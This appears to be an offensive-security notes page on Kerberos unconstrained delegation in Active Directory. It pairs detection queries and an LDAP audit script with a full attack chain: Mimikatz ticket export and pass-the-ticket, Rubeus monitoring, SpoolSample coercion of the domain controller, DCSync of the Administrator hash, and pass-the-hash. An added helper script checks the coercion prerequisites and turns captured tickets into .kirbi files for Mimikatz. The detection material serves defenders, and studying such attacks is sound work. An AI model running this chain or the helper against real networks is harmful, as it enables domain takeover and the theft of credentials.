RFC - Offensive Security Notes

Unconstrained delegation

Unconstrained delegation lets a service impersonate any user who authenticates to it, against any other service in the domain. More specifically, when a user requests a service ticket (TGS) for a service running on a host trusted for unconstrained delegation, the KDC marks that ticket ok-as-delegate; the Windows client then requests a forwarded copy of its own TGT and sends it to the service together with the service ticket in the AP-REQ. The service extracts the user's TGT and caches it in LSASS so that it can later request tickets for any service on the user's behalf. Anyone with local administrator rights on such a host can therefore extract every cached TGT, and obtaining one of them can lead to domain compromise when it belongs to the machine account of a domain controller or to a highly privileged account such as a domain administrator. For a host to impersonate a user this way, two conditions must hold:

  1. The host's computer (or service) account has the TRUSTED_FOR_DELEGATION flag set in its userAccountControl attribute ("Trust this computer for delegation to any service (Kerberos only)"). Domain controllers have this flag by default.

  2. The user's account does not have the NOT_DELEGATED flag set ("Account is sensitive and cannot be delegated") and is not a member of the Protected Users group. Neither protection is applied to ordinary domain accounts by default, so most users, domain admins included, are delegable unless someone has explicitly hardened them.

Detecting

AD Module

## Computer accounts trusted for unconstrained delegation. primarygroupid 515 (Domain Computers) leaves out
## domain controllers (primary group 516), which carry the flag by design and are not a finding.
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

Other delegation-related properties worth pulling at the same time, so that the other delegation types are not missed:

  • TrustedToAuthForDelegation (constrained delegation with protocol transition)

  • msDS-AllowedToDelegateTo (targets of constrained delegation)

  • PrincipalsAllowedToDelegateToAccount (resource-based constrained delegation)

Get-ADComputer "Hive" -Properties TrustedForDelegation, TrustedToAuthForDelegation, msDS-AllowedToDelegateTo, PrincipalsAllowedToDelegateToAccount

Powerview 3.0

## Every computer with TRUSTED_FOR_DELEGATION set, domain controllers included
Get-DomainComputer -Unconstrained
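The two one-liners above need either RSAT or PowerView on the box. The following is an added example (not part of the original notes) that does the same audit over plain LDAP with System.DirectoryServices, so it runs from any domain-joined host, and it goes one step further than the page: besides listing the accounts trusted for unconstrained delegation, it lists the Domain Admins that such a host could actually impersonate, i.e. those without NOT_DELEGATED and outside Protected Users. It assumes the caller can read the domain (any authenticated user can by default), that the built-in groups still live under CN=Users, and that the domain is at a functional level where Protected Users exists.

```powershell
# Added example, not from the original notes: audit unconstrained delegation over LDAP
# without RSAT, the AD module or PowerView. Assumptions: default group locations under
# CN=Users and a domain where the Protected Users group exists.

$UAC_TRUSTED_FOR_DELEGATION = 0x80000    # userAccountControl bit: unconstrained delegation
$UAC_NOT_DELEGATED          = 0x100000   # userAccountControl bit: "Account is sensitive and cannot be delegated"
$LDAP_BIT_AND  = '1.2.840.113556.1.4.803'   # LDAP matching rule: bitwise AND on an integer attribute
$LDAP_IN_CHAIN = '1.2.840.113556.1.4.1941'  # LDAP matching rule: transitive (nested) group membership

$domainDn         = [string]([ADSI]'LDAP://RootDSE').defaultNamingContext
$domainAdminsDn   = "CN=Domain Admins,CN=Users,$domainDn"     # assumed default location
$protectedUsersDn = "CN=Protected Users,CN=Users,$domainDn"   # assumed default location

function Search-Ldap {
    param([string]$Filter, [string[]]$Properties)
    $s = New-Object System.DirectoryServices.DirectorySearcher
    $s.SearchRoot = [ADSI]"LDAP://$domainDn"
    $s.Filter     = $Filter
    $s.PageSize   = 1000          # paged search so large domains are not truncated at 1000 results
    [void]$s.PropertiesToLoad.AddRange($Properties)
    $s.FindAll()
}

# 1. Accounts (computers and service users) that will cache every caller's TGT in LSASS.
$delegationFilter = "(&(|(objectCategory=computer)(objectCategory=person))" +
                    "(userAccountControl:${LDAP_BIT_AND}:=$UAC_TRUSTED_FOR_DELEGATION))"
$delegators = foreach ($r in Search-Ldap $delegationFilter @('samaccountname','dnshostname','primarygroupid','serviceprincipalname')) {
    $p    = $r.Properties
    $pgid = [int]$p['primarygroupid'][0]
    # 516 = Domain Controllers, 521 = Read-only Domain Controllers: expected. Anything else is a finding.
    $status = switch ($pgid) { 516 { 'DC (expected)' } 521 { 'RODC (expected)' } default { 'FINDING' } }
    [pscustomobject]@{
        Account = $p['samaccountname'][0]
        Host    = if ($p['dnshostname'].Count -gt 0) { $p['dnshostname'][0] } else { '-' }
        Status  = $status
        SPNs    = (@($p['serviceprincipalname']) -join ';')
    }
}

# 2. Domain Admins (nested membership included) a delegation host could impersonate:
#    NOT_DELEGATED not set and not in Protected Users. Each is a domain-takeover path via any FINDING above.
$exposedFilter = "(&(objectCategory=person)(memberOf:${LDAP_IN_CHAIN}:=$domainAdminsDn)" +
                 "(!(userAccountControl:${LDAP_BIT_AND}:=$UAC_NOT_DELEGATED))" +
                 "(!(memberOf:${LDAP_IN_CHAIN}:=$protectedUsersDn)))"
$exposedAdmins = foreach ($r in Search-Ldap $exposedFilter @('samaccountname')) {
    $r.Properties['samaccountname'][0]
}

"== Accounts trusted for unconstrained delegation =="
$delegators | Sort-Object Status | Format-Table -AutoSize
"== Domain Admins still delegable =="
$exposedAdmins
# Fix for each exposed admin: Set-ADAccountControl -Identity <sam> -AccountNotDelegated $true,
# or add the account to Protected Users (which also disables NTLM and DES/RC4 for it).
```

The bitwise LDAP matching rule is what the AD module's `-Filter {TrustedForDelegation -eq $true}` translates to under the hood; querying the raw userAccountControl bit also catches user accounts (service accounts) with the flag, which `Get-ADComputer` never returns.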

Exploiting

## A domain admin has to connect to a service on the delegation host (appsrv), either tricked into it or simply
## waited for. Reading the cached tickets out of LSASS needs local admin on appsrv; once the DA has connected,
## their TGT is among the exported tickets:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

## The exported DA TGT can then be injected into the current session (pass-the-ticket):
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Force authentication

Several protocols can coerce the domain controller's machine account into authenticating to another host on the network, for example the Print Spooler service (MS-RPRN, the "printer bug" abused by SpoolSample) and the Encrypting File System RPC interface (MS-EFSRPC, PetitPotam). The network logon session the DC creates on the delegation host is short-lived and its forwarded TGT disappears from LSASS with it, so Rubeus must already be running there in monitor mode, as local administrator or SYSTEM since it reads LSASS, before the coercion is triggered:

Rubeus.exe monitor /monitorinterval:10 /targetuser:DC$ /nowrap

Triggering the printer bug from the workstation makes the domain controller authenticate back to the host configured for unconstrained delegation (Hive). The first argument is the host to coerce, the second the host it should connect to; it only works while the Print Spooler service is running on the DC.

SpoolSample.exe dc hive

The ticket granting ticket (TGT) of the domain controller machine account is then received by Hive and captured by Rubeus.

Rubeus prints the ticket base64-encoded. Rubeus itself takes that form directly (ptt /ticket:<base64>), but Mimikatz expects a .kirbi file, so from a PowerShell console the blob has to be decoded and written to disk first:

[IO.File]::WriteAllBytes("C:\Users\pentestlab.PURPLE\Desktop\DC.kirbi", [Convert]::FromBase64String("[base64string]"))

Injecting the DC machine-account TGT into the current logon session with Mimikatz pass-the-ticket lets that session act as the domain controller. Domain controller computer accounts hold the directory replication rights, so the result can be verified with DCSync: dump the NTLM hash of the domain Administrator account and use it for pass-the-hash command execution on the domain controller.

kerberos::ptt DC.kirbi
lsadump::dcsync /domain:purple.lab /user:Administrator
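The chain above fails silently at two points: when the DC's Print Spooler is off (no callback ever comes) and when the capturing host is not actually trusted for delegation (the callback comes, but without a forwarded TGT). It also needs a clean copy of the base64 blob. The following is an added example, not part of the original notes, that checks both prerequisites before coercion and then turns a saved Rubeus monitor log into .kirbi files, rejecting anything that does not decode to a KRB-CRED. The DC name, the log path and the sample log lines are constructed assumptions; the log layout assumed is Rubeus's "User : <name>" line followed by the base64 blob on its own line, as printed with /nowrap.

```powershell
# Added example, not from the original notes. Run on the unconstrained-delegation host (Hive).
# Assumptions: DC FQDN, log path and the demo log below are made up; Rubeus monitor output was
# saved with: Rubeus.exe monitor /monitorinterval:10 /targetuser:DC$ /nowrap > monitor.log

$UAC_TRUSTED_FOR_DELEGATION = 0x80000

function Test-CoercionPrereqs {
    param([string]$DcHost)
    $ok = $true
    # SpoolSample/printerbug talks MS-RPRN over \pipe\spoolss; no pipe means the Spooler is stopped and the DC will never call back.
    if (Test-Path "\\$DcHost\pipe\spoolss") { Write-Host "[+] $DcHost exposes \pipe\spoolss" }
    else { Write-Host "[-] $DcHost has no \pipe\spoolss (Print Spooler stopped?)"; $ok = $false }
    # This host must itself carry TRUSTED_FOR_DELEGATION, otherwise the DC authenticates but forwards no TGT.
    $s = New-Object System.DirectoryServices.DirectorySearcher   # defaults to the current domain
    $s.Filter = "(&(objectCategory=computer)(sAMAccountName=$env:COMPUTERNAME`$))"
    [void]$s.PropertiesToLoad.Add('useraccountcontrol')
    $uac = [int]$s.FindOne().Properties['useraccountcontrol'][0]
    if ($uac -band $UAC_TRUSTED_FOR_DELEGATION) { Write-Host "[+] $env:COMPUTERNAME is trusted for unconstrained delegation" }
    else { Write-Host "[-] $env:COMPUTERNAME is not trusted for delegation; the DC's TGT will not be forwarded here"; $ok = $false }
    return $ok
}

function Save-Kirbi {
    param([string]$LogPath, [string]$TargetUser, [string]$OutDir = $PWD.Path)
    $user = $null; $seen = @{}; $written = @()
    foreach ($line in Get-Content $LogPath) {
        if ($line -match '^\s*User\s*:\s*(\S+)') { $user = $Matches[1]; continue }
        if (-not $user -or $line -notmatch '^\s*([A-Za-z0-9+/]{100,}={0,2})\s*$') { continue }
        $b64 = $Matches[1]
        if ($user -notlike "$TargetUser@*") { continue }        # Rubeus prints user@REALM; keep only the target
        try { $bytes = [Convert]::FromBase64String($b64) } catch { Write-Warning "unreadable base64 for $user"; continue }
        # A .kirbi is a DER-encoded KRB-CRED, tag [APPLICATION 22] = 0x76. Anything else is a copy-paste accident.
        if ($bytes[0] -ne 0x76) { Write-Warning ("skipping blob for {0}: first byte 0x{1:x2}, not a KRB-CRED" -f $user, $bytes[0]); continue }
        $hash = [BitConverter]::ToString([Security.Cryptography.SHA256]::Create().ComputeHash($bytes)).Replace('-','').Substring(0,8)
        if ($seen[$hash]) { continue }                           # skip exact duplicates of a ticket already written
        $seen[$hash] = $true
        $path = Join-Path $OutDir ("{0}-{1}.kirbi" -f ($user -replace '[\\/:$@]','_'), $hash)
        [IO.File]::WriteAllBytes($path, $bytes)
        $written += $path
    }
    $written
}

# --- Constructed demo input (not real tickets): one KRB-CRED-shaped blob and one that is not ---
$fakeCred = New-Object byte[] 128; $fakeCred[0] = 0x76; $fakeCred[1] = 0x82   # KRB-CRED tag + long-form length prefix
$bogus    = New-Object byte[] 128; $bogus[0]    = 0x6e                          # 0x6e = AP-REQ, not what a .kirbi holds
$demoLog = @'
[*] Found new TGT:

  User                  :  DC$@PURPLE.LAB
  Base64EncodedTicket   :

    {0}

[*] Found new TGT:

  User                  :  DC$@PURPLE.LAB
  Base64EncodedTicket   :

    {1}
'@ -f [Convert]::ToBase64String($fakeCred), [Convert]::ToBase64String($bogus)

$demoPath = Join-Path $env:TEMP 'rubeus-demo.log'
Set-Content -Path $demoPath -Value $demoLog
Save-Kirbi -LogPath $demoPath -TargetUser 'DC$' -OutDir $env:TEMP   # writes one .kirbi, warns about the bogus blob

# Live use on Hive (needs the domain):
#   Test-CoercionPrereqs -DcHost 'dc.purple.lab'        # assumed DC name; both checks must pass before SpoolSample
#   Save-Kirbi -LogPath .\monitor.log -TargetUser 'DC$'  # then mimikatz: kerberos::ptt <file> / lsadump::dcsync ...
```

The first-byte check is deliberately minimal: it does not parse the ticket, it only catches the common failure where a truncated blob or the wrong ticket type (an AP-REQ or raw ticket rather than the KRB-CRED that Rubeus exports) ends up in a file Mimikatz then rejects with an unhelpful error.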
